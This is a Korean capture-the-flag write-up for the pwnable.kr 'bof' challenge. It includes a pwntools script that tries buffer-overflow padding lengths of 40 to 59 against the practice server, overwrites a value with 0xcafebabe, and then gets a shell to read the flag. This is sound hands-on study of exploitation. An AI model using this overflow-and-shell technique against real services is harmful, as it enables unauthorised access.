pwnable.kr 3번 bof : pwntools로 자동으로 브포 때리면서 풀기

pwnable.kr 3번 bof : pwntools로 자동으로 브포 때리면서 풀기

몇 달 전이였나 블로그에 pwnable.kr 3번 문제에 대한 Write-Up을 올린 적 있다.

구름 ide를 뒤지다 얼마 전 pwntools를 배우면서 짠 이 문제의 exploit을 발견해서 올려두려고 한다.

나라는 늅늅이는 분석을 엄청 못하니까 gdb로 '음 오프셋을 뭘로 해야 할까?^^' 하면서 찾기가 어렵다.

그럴 때는 브루트포싱이 답이다.

excessive brute-forcing은 자제하라고 공지에 나와 있으니까 그냥 순수하게 40~59까지만 돌려보자(이미 답을 알고 있으니...)

from pwn import *

for i in range(40, 60):
    r = remote("pwnable.kr", 9000)
    payload = "\x90"*i + p32(0xcafebabe)
    r.sendline(payload)
    response = r.recv(4096, timeout=0.5)
    if ( response == '' ):
        print "found correct payload : ", payload
        r.sendline("cat flag")
        r.interactive()
        break
    else:
        r.close()

짠~ 진짜루 브루트포스로 i값을 40~59 범위로 올리면서 하나씩 돌려본다.

실행하면 저렇게 주르르륵 브포때리다가 쉘 따고 플래그 출력해준다.